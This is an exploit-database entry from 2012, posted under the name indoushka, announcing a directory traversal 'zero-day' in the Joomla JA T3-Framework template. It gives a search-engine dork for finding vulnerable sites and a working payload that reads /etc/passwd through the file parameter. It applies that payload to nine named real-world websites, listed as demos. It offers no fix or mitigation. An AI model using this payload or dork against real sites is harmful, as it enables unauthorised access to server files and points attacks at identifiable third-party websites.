Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day



EKU-ID: 1942 CVE: OSVDB-ID:
Author: indoushka Published: 2012-04-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=======================================================================
Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day
=======================================================================

# Vendor:
hhttp://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15

# Author : indoushka

# Tested on : Ubuntu Linux 9.10

########################################################


# Dork : inurl:/index.php?jat3action=

# Demo :
http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=
gzip&type=css&v=1

http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&t
ype=css&v=1

http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&typ
e=css&v=1

http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action
=gzip&type=css&v=1

http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip
&type=css&v=1

-------------

http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&
amp;type=css&v=1

******************************************************